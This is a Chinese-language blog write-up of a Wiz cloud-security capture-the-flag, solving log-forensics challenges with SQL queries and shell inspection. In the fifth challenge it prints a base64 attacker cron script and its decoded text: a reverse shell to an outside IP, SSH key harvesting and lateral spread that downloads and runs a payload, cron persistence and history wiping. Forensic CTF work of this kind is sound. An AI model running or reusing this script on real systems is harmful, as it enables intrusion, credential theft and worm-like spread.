WIZ CTF shared 发表于 2025-05-08 更新于 2025-05-08
字数总计: 1.5k 阅读时长: 8分钟
云安全 CTF WIZ CTF shared Ivoripuion 2025-05-08 2025-05-08 发现WIZ举办了个在线的CTF比赛,下班回家玩了下,链接如下:https://www.cloudhuntinggames.com/
Challenge 1 发现日志里有不少的存在包含攻击者邮箱字符串的Fiz:
那直接在请求的日志里找所有的相关日志:
1 2 SELECT * FROM s3_data_events WHERE requestParameters like '%Fiz%'
发现有一条IAM包含drink,那就是它了:
第一题的flag:arn:aws:sts::509843726190:assumed-role/S3Reader/drinks
Challenge 2 检索drinks相关的日志:
1 2 SELECT * FROM cloudtrail WHERE requestParameters like "%drink%"
直接就有了:
第二题的flag:Moe.Jito
Challenge 3 这个直接题目找答案,直接在userIdentity_ARN里找i-相关的字符串:
1 2 SELECT * FROM cloudtrail WHERE UserAge like "%i-%"
发现有一条日志比较怪:
对应的机器uid就是flag。
第三题的flag:i-0a44002eec2f16c25
Challenge 4 发现没日志以后怀疑是日志文件夹被挂载了,看一下:
1 2 3 4 5 6 7 8 root@ssh-fetcher:~ TARGET SOURCE FSTYPE OPTIONS / overlay[/work/rootfs] overlay ro,relatime,lowerdir=/var/lib/contai |-/var/log overlay[/work/storage/4ca0f801-78c1-427b-ab34-adbb86a97233/log] | overlay rw,relatime,lowerdir=/var/lib/contai | `-/var/log overlay[/work/rootfs/tmp/.../mnt] overlay ro,relatime,lowerdir=/var/lib/contai |-/dev/null tmpfs[/null] tmpfs rw,nosuid,size=65536k,mode=755,inode `-/proc none proc ro,relatime
取消挂载后直接看日志即可:
1 2 3 root@ssh-fetcher:~ root@ssh-fetcher:~ iPhpts/0102.54.197.238root@ssh-fetcher:~
第四题的flag:102.54.197.238
Challenge 5 找到crontab的目录,然后找到定时执行的脚本:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 root@postgresql-service:~ 0 0 * * * bash /var/lib/postgresql/data/pg_sched root@postgresql-service:~ echo "IyEvYmluL2Jhc2gNCg0KIyBMaXN0IG9mIGludGVyZXN0aW5nIHBvbGljaWVzDQpWVUxORVJBQkxF X1BPTElDSUVTPSgiQWRtaW5pc3RyYXRvckFjY2VzcyIgIlBvd2VyVXNlckFjY2VzcyIgIkFtYXpv blMzRnVsbEFjY2VzcyIgIklBTUZ1bGxBY2Nlc3MiICJBV1NMYW1iZGFGdWxsQWNjZXNzIiAiQVdT TGFtYmRhX0Z1bGxBY2Nlc3MiKQ0KDQpTRVJWRVI9IjM0LjExOC4yMzkuMTAwIg0KUE9SVD00NDQ0 DQpVU0VSTkFNRT0iRml6elNoYWRvd3NfMSINClBBU1NXT1JEPSJHeDI3cFF3ejkyUmsiDQpDUkVE RU5USUFMU19GSUxFPSIvdG1wL2MiDQoNClNDUklQVF9QQVRIPSIkKGNkIC0tICIkKGRpcm5hbWUg LS0gIiR7QkFTSF9TT1VSQ0VbMF19IikiICY+L2Rldi9udWxsICYmIHB3ZCkvJChiYXNlbmFtZSAt LSAiJHtCQVNIX1NPVVJDRVswXX0iKSINCg0KIyBDaGVjayBpZiBhIGNvbW1hbmQgZXhpc3RzDQpj aGVja19jb21tYW5kKCkgew0KICAgIGlmICEgY29tbWFuZCAtdiAiJDEiICY+IC9kZXYvbnVsbDsg dGhlbg0KICAgICAgICBpbnN0YWxsX2RlcGVuZGVuY3kgIiQxIg0KICAgIGZpDQp9DQoNCiMgSW5z dGFsbCBtaXNzaW5nIGRlcGVuZGVuY2llcw0KaW5zdGFsbF9kZXBlbmRlbmN5KCkgew0KICAgIGxv Y2FsIHBhY2thZ2U9IiQxIg0KICAgIGlmIFtbICIkcGFja2FnZSIgPT0gImN1cmwiIF1dOyB0aGVu DQogICAgICAgIGFwdC1nZXQgaW5zdGFsbCBjdXJsIC15ICY+IC9kZXYvbnVsbA0KICAgICAgICAg ICAgICAgIHl1bSBpbnN0YWxsIGN1cmwgLXkgJj4gL2Rldi9udWxsDQogICAgZWxpZiBbWyAiJHBh Y2thZ2UiID09ICJ1bnppcCIgXV07IHRoZW4NCiAgICAgICAgYXB0LWdldCBpbnN0YWxsIHVuemlw IC15ICY+IC9kZXYvbnVsbA0KICAgICAgICAgICAgICAgIHl1bSBpbnN0YWxsIHVuemlwIC15ICY+ IC9kZXYvbnVsbA0KICAgIGVsaWYgW1sgIiRwYWNrYWdlIiA9PSAiYXdzIiBdXTsgdGhlbg0KICAg ICAgICBpbnN0YWxsX2F3c19jbGkNCiAgICBmaQ0KfQ0KDQojIEluc3RhbGwgQVdTIENMSSBsb2Nh bGx5DQppbnN0YWxsX2F3c19jbGkoKSB7DQogICAgbWtkaXIgLXAgIiRIT01FLy5hd3MtY2xpIg0K ICAgIGN1cmwgLXMgImh0dHBzOi8vYXdzY2xpLmFtYXpvbmF3cy5jb20vYXdzY2xpLWV4ZS1saW51 eC14ODZfNjQuemlwIiAtbyAiJEhPTUUvLmF3cy1jbGkvYXdzY2xpdjIuemlwIg0KDQogICAgdW56 aXAgLXEgIiRIT01FLy5hd3MtY2xpL2F3c2NsaXYyLnppcCIgLWQgIiRIT01FLy5hd3MtY2xpLyIN Cg0KICAgICIkSE9NRS8uYXdzLWNsaS9hd3MvaW5zdGFsbCIgLS1pbnN0YWxsLWRpciAiJEhPTUUv LmF3cy1jbGkvYmluIiAtLWJpbi1kaXIgIiRIT01FLy5hd3MtY2xpL2JpbiINCg0KICAgICMgQWRk IEFXUyBDTEkgdG8gUEFUSA0KICAgIGV4cG9ydCBQQVRIPSIkSE9NRS8uYXdzLWNsaS9iaW46JFBB VEgiDQogICAgZWNobyAnZXhwb3J0IFBBVEg9IiRIT01FLy5hd3MtY2xpL2JpbjokUEFUSCInID4+ ICIkSE9NRS8uYmFzaHJjIg0KfQ0KDQoNCiMgVHJ5IHRvIHNwcmVhZA0Kc3ByZWFkX3NzaCgpIHsN CiAgICBmaW5kX2FuZF9leGVjdXRlKCkgew0KICAgICAgICBsb2NhbCBLRVlTPSQoZmluZCB+LyAv cm9vdCAvaG9tZSAtbWF4ZGVwdGggNSAtbmFtZSAnaWRfcnNhKicgfCBncmVwIC12dyBwdWI7DQog ICAgICAgICAgICAgICAgICAgICBncmVwIElkZW50aXR5RmlsZSB+Ly5zc2gvY29uZmlnIC9ob21l LyovLnNzaC9jb25maWcgL3Jvb3QvLnNzaC9jb25maWcgMj4vZGV2L251bGwgfCBhd2sgJ3twcmlu dCAkMn0nOw0KICAgICAgICAgICAgICAgICAgICAgZmluZCB+LyAvcm9vdCAvaG9tZSAtbWF4ZGVw dGggNSAtbmFtZSAnKi5wZW0nIHwgc29ydCAtdSkNCg0KICAgICAgICBsb2NhbCBIT1NUUz0kKGdy ZXAgSG9zdE5hbWUgfi8uc3NoL2NvbmZpZyAvaG9tZS8qLy5zc2gvY29uZmlnIC9yb290Ly5zc2gv Y29uZmlnIDI+L2Rldi9udWxsIHwgYXdrICd7cHJpbnQgJDJ9JzsNCiAgICAgICAgICAgICAgICAg ICAgICBncmVwIC1FICIoc3NofHNjcCkiIH4vLmJhc2hfaGlzdG9yeSAvaG9tZS8qLy5iYXNoX2hp c3RvcnkgL3Jvb3QvLmJhc2hfaGlzdG9yeSAyPi9kZXYvbnVsbCB8IGdyZXAgLW9QICIoWzAtOV17 MSwzfVwuKXszfVswLTldezEsM318XGIoPzpbYS16QS1aMC05LV0rXC4pK1thLXpBLVpdezIsfVxi IjsNCiAgICAgICAgICAgICAgICAgICAgICBncmVwIC1vUCAiKFswLTldezEsM31cLil7M31bMC05 XXsxLDN9fFxiKD86W2EtekEtWjAtOS1dK1wuKStbYS16QS1aXXsyLH1cYiIgfi8qLy5zc2gva25v d25faG9zdHMgL2hvbWUvKi8uc3NoL2tub3duX2hvc3RzIC9yb290Ly5zc2gva25vd25faG9zdHMg Mj4vZGV2L251bGwgfA0KICAgICAgICAgICAgICAgICAgICAgIGdyZXAgLXZ3IDEyNy4wLjAuMSB8 IHNvcnQgLXUpDQoNCiAgICAgICAgbG9jYWwgVVNFUlM9JChlY2hvICJyb290IjsNCiAgICAgICAg ICAgICAgICAgICAgICBmaW5kIH4vIC9yb290IC9ob21lIC1tYXhkZXB0aCAyIC1uYW1lICcuc3No JyB8IHhhcmdzIC1JIHt9IGZpbmQge30gLW5hbWUgJ2lkX3JzYScgfCBhd2sgLUYnLycgJ3twcmlu dCAkM30nIHwgZ3JlcCAtdiAiLnNzaCIgfCBzb3J0IC11KQ0KDQogICAgICAgZm9yIGtleSBpbiAk S0VZUzsgZG8NCiAgICAgICAgICAgIGNobW9kIDQwMCAiJGtleSINCiAgICAgICAgICAgIGZvciB1 c2VyIGluICRVU0VSUzsgZG8NCg0KICAgICAgICAgICAgICBlY2hvICIkdXNlciINCiAgICAgICAg ICAgICAgICAgICBmb3IgaG9zdCBpbiAkSE9TVFM7IGRvDQogICAgICAgICAgICAgICAgICAgICBz c2ggLW9TdHJpY3RIb3N0S2V5Q2hlY2tpbmc9bm8gLW9CYXRjaE1vZGU9eWVzIC1vQ29ubmVjdFRp bWVvdXQ9NSAtaSAiJGtleSIgIiR1c2VyQCRob3N0IiAiKGN1cmwgLXUgJFVTRVJOQU1FOiRQQVNT V09SRCAtbyAvZGV2L3NobS9jb250cm9sbGVyIGh0dHA6Ly8kU0VSVkVSL2ZpbGVzL2NvbnRyb2xs ZXIgJiYgYmFzaCAvZGV2L3NobS9jb250cm9sbGVyKSINCiAgICAgICAgICAgICAgICBkb25lDQog ICAgICAgICAgICBkb25lDQogICAgICAgIGRvbmUNCiAgICB9DQoNCiAgICBmaW5kX2FuZF9leGVj dXRlDQp9DQoNCmNyZWF0ZV9wZXJzaXN0ZW5jZSgpIHsNCihjcm9udGFiIC1sIDI+L2Rldi9udWxs OyBlY2hvICIwIDAgKiAqICogYmFzaCAkU0NSSVBUX1BBVEgiKSB8IGNyb250YWIgLQ0KfQ0KDQpj cmVhdGVfc2hlbGwgKCkgew0KICAgIGVjaG8gIkNyZWF0aW5nIGEgcmV2ZXJzZSBzaGVsbCINCiAg ICAvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvIiRTRVJWRVIiLyIkUE9SVCIgMD4mMQ0KfQ0KDQoj IENoZWNrIHJvbGUgcG9saWNpZXMNCmNoZWNrX3JvbGVfdnVsbigpIHsNCiAgICBsb2NhbCBST0xF X05BTUU9JChhd3Mgc3RzIGdldC1jYWxsZXItaWRlbnRpdHkgLS1xdWVyeSAiQXJuIiAtLW91dHB1 dCB0ZXh0IHwgYXdrIC1GJy8nICd7cHJpbnQgJDJ9JykNCg0KICAgICMgTGlzdCBhdHRhY2hlZCBw b2xpY2llcyBmb3IgdGhlIGdpdmVuIHJvbGUNCiAgICBhdHRhY2hlZF9wb2xpY2llcz0kKGF3cyBp YW0gbGlzdC1hdHRhY2hlZC1yb2xlLXBvbGljaWVzIC0tcm9sZS1uYW1lICIkUk9MRV9OQU1FIiAt LXF1ZXJ5ICdBdHRhY2hlZFBvbGljaWVzWypdLlBvbGljeU5hbWUnIC0tb3V0cHV0IHRleHQpDQoN CiAgICAjIENoZWNrIGlmIHRoZSB1c2VyIGhhcyBJQU0gcGVybWlzc2lvbnMgdG8gbGlzdCBwb2xp Y2llcw0KICAgIGlmIFtbICQ/IC1lcSAwIF1dOyB0aGVuDQogICAgICAgICMgSWYgdGhlIHVzZXIg aGFzIElBTSBwZXJtaXNzaW9ucywgY2hlY2sgYXR0YWNoZWQgcG9saWNpZXMNCiAgICAgICAgYXR0 YWNoZWRfcG9saWNpZXNfYXJyYXk9KCRhdHRhY2hlZF9wb2xpY2llcykNCiAgICAgICAgZm9yIHBv bGljeSBpbiAiJHthdHRhY2hlZF9wb2xpY2llc19hcnJheVtAXX0iOyBkbw0KICAgICAgICAgICAg Zm9yIHZ1bG5fcG9saWN5IGluICIke1ZVTE5FUkFCTEVfUE9MSUNJRVNbQF19IjsgZG8NCiAgICAg ICAgICAgICAgICBpZiBbWyAiJHBvbGljeSIgPT0gIiR2dWxuX3BvbGljeSIgXV07IHRoZW4NCiAg ICAgICAgICAgICAgICAgICAgcmV0dXJuIDANCiAgICAgICAgICAgICAgICBmaQ0KICAgICAgICAg ICAgZG9uZQ0KICAgICAgICBkb25lDQogICAgZWxzZQ0KICAgICAgICBhd3MgczMgbHMNCiAgICAg ICAgaWYgW1sgJD8gLWVxIDAgXV07IHRoZW4NCiAgICAgICAgICAgIHJldHVybiAwDQogICAgICAg IGVsc2UNCiAgICAgICAgICAgIGF3cyBsYW1iZGEgbGlzdC1mdW5jdGlvbnMNCiAgICAgICAgICAg IGlmIFtbICQ/IC1lcSAwIF1dOyB0aGVuDQogICAgICAgICAgICAgICAgcmV0dXJuIDANCiAgICAg ICAgICAgIGVsc2UNCiAgICAgICAgICAgICAgICByZXR1cm4gMQ0KICAgICAgICAgICAgZmkNCiAg ICAgICAgZmkNCiAgICBmaQ0KfQ0KDQojIENoZWNrIHJlcXVpcmVkIGRlcGVuZGVuY2llcw0KY2hl Y2tfY29tbWFuZCAiY3VybCINCmNoZWNrX2NvbW1hbmQgInVuemlwIg0KY2hlY2tfY29tbWFuZCAi YXdzIg0KDQpjaGVja19yb2xlX3Z1bG4NCmlmIFtbICQ/IC1lcSAwIF1dOyB0aGVuDQogICAgICAg IGNyZWF0ZV9zaGVsbA0KZWxzZQ0KICAgICAgICBjcmVhdGVfcGVyc2lzdGVuY2UNCiAgICAgICAg c3ByZWFkX3NzaA0KCWNhdCAvZGV2L251bGwgPiB+Ly5iYXNoX2hpc3RvcnkNCmZpDQo=" | base64 -d | bash
base64 decode的结果:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 #!/bin/bash VULNERABLE_POLICIES=("AdministratorAccess" "PowerUserAccess" "AmazonS3FullAccess" "IAMFullAccess" "AWSLambdaFullAccess" "AWSLambda_FullAccess" ) SERVER="34.118.239.100" PORT=4444 USERNAME="FizzShadows_1" PASSWORD="Gx27pQwz92Rk" CREDENTIALS_FILE="/tmp/c" SCRIPT_PATH="$(cd -- "$(dirname -- "${BASH_SOURCE[0]} " ) " &>/dev/null && pwd) /$(basename -- "${BASH_SOURCE[0]} " ) " check_command if ! command -v "$1 " &> /dev/null; then install_dependency "$1 " fi } install_dependency local package="$1 " if [[ "$package " == "curl" ]]; then apt-get install curl -y &> /dev/null yum install curl -y &> /dev/null elif [[ "$package " == "unzip" ]]; then apt-get install unzip -y &> /dev/null yum install unzip -y &> /dev/null elif [[ "$package " == "aws" ]]; then install_aws_cli fi } install_aws_cli mkdir -p "$HOME /.aws-cli" curl -s "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "$HOME /.aws-cli/awscliv2.zip" unzip -q "$HOME /.aws-cli/awscliv2.zip" -d "$HOME /.aws-cli/" "$HOME /.aws-cli/aws/install" --install-dir "$HOME /.aws-cli/bin" --bin-dir "$HOME /.aws-cli/bin" export PATH="$HOME /.aws-cli/bin:$PATH " echo 'export PATH="$HOME/.aws-cli/bin:$PATH"' >> "$HOME /.bashrc" } spread_ssh find_and_execute local KEYS=$(find ~/ /root /home -maxdepth 5 -name 'id_rsa*' | grep -vw pub; grep IdentityFile ~/.ssh/config /home/*/.ssh/config /root/.ssh/config 2>/dev/null | awk '{print $2}' ; find ~/ /root /home -maxdepth 5 -name '*.pem' | sort -u) local HOSTS=$(grep HostName ~/.ssh/config /home/*/.ssh/config /root/.ssh/config 2>/dev/null | awk '{print $2}' ; grep -E "(ssh|scp)" ~/.bash_history /home/*/.bash_history /root/.bash_history 2>/dev/null | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}|\b(?:[a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}\b" ; grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}|\b(?:[a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}\b" ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts 2>/dev/null | grep -vw 127.0.0.1 | sort -u) local USERS=$(echo "root" ; find ~/ /root /home -maxdepth 2 -name '.ssh' | xargs -I {} find {} -name 'id_rsa' | awk -F'/' '{print $3}' | grep -v ".ssh" | sort -u) for key in $KEYS ; do chmod 400 "$key " for user in $USERS ; do echo "$user " for host in $HOSTS ; do ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i "$key " "$user @$host " "(curl -u $USERNAME :$PASSWORD -o /dev/shm/controller http://$SERVER /files/controller && bash /dev/shm/controller)" done done done } find_and_execute } create_persistence (crontab -l 2>/dev/null; echo "0 0 * * * bash $SCRIPT_PATH " ) | crontab - } create_shell echo "Creating a reverse shell" /bin/bash -i >& /dev/tcp/"$SERVER " /"$PORT " 0>&1 } check_role_vuln local ROLE_NAME=$(aws sts get-caller-identity --query "Arn" --output text | awk -F'/' '{print $2}' ) attached_policies=$(aws iam list-attached-role-policies --role-name "$ROLE_NAME " --query 'AttachedPolicies[*].PolicyName' --output text) if [[ $? -eq 0 ]]; then attached_policies_array=($attached_policies ) for policy in "${attached_policies_array[@]} " ; do for vuln_policy in "${VULNERABLE_POLICIES[@]} " ; do if [[ "$policy " == "$vuln_policy " ]]; then return 0 fi done done else aws s3 ls if [[ $? -eq 0 ]]; then return 0 else aws lambda list-functions if [[ $? -eq 0 ]]; then return 0 else return 1 fi fi fi } check_command "curl" check_command "unzip" check_command "aws" check_role_vuln if [[ $? -eq 0 ]]; then create_shell else create_persistence spread_ssh cat /dev/null > ~/.bash_history fi
curl一下里面的服务器,发现是个文件服务器:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 root@postgresql-service:~ ___________.__ _________.__ .___ \_ _____/|__|_______________ / _____/| |__ __| _/____ ______ _ ________ | __) | \___ /\___ / \_____ \ | | \ / __ |\__ \ / _ \ \/ \/ / ___/ | \ | |/ / / / / \| Y \/ /_/ | / __ \( <_> ) /\___ \ \___ / |__/_____ \/_____ \/_______ /|___| /\____ |(____ /\____/ \/\_//____ > \/ \/ \/ \/ \/ \/ \/ \/ Available Endpoints: ------------------ 1. List All Files GET /files Returns a list of all files in the system. 2. Upload File POST /files/upload Upload a new file to the system. 3. Download File GET /files/{filename} Download a specific file by name. 4. Delete File DELETE /files/{filename} Remove a file from the system. Response Codes: ------------- 200 - Success 401 - Unauthorized (Invalid credentials) 403 - Forbidden (Access denied) 404 - File not found 500 - Server error
看一下文件:
1 2 3 4 5 6 7 8 9 10 11 12 13 root@postgresql-service:~ Size Date Modified Name -------------------------------------------------- 4.0KB Jan 23 14:35 Root Beer.txt 5.0KB Jan 23 12:35 Man-in-the-Mojito.txt 3.5KB Jan 23 13:35 ExfilCola-Top-Secret.txt 4.5KB Jan 23 15:35 Prigat Overflow.txt 10.0KB Jan 23 16:35 controller 2.4MB Jan 27 12:35 Q3_2023_Financial_Report.pdf 1.2MB Feb 06 12:35 2024_budget_planning.xlsx 960.0KB Jan 24 12:35 employee_directory.xlsx 1.5MB Feb 11 12:35 taste_test_results_oct2023.xlsx 3.5MB Feb 16 12:35 bottling_line_specs_v2.pdf
删掉机密的可乐制作文件ExfilCola-Top-Secret.txt即可:
1 2 3 root@postgresql-service:~ 00/files/ExfilCola-Top-Secret.txt Success! You've deleted the secret recipe before it could be exposed. The flag is: {I know it when I see it}
第五题的flag:{I know it when I see it}
证书 搞完了会发个证书,邮件地址可以随便填写:
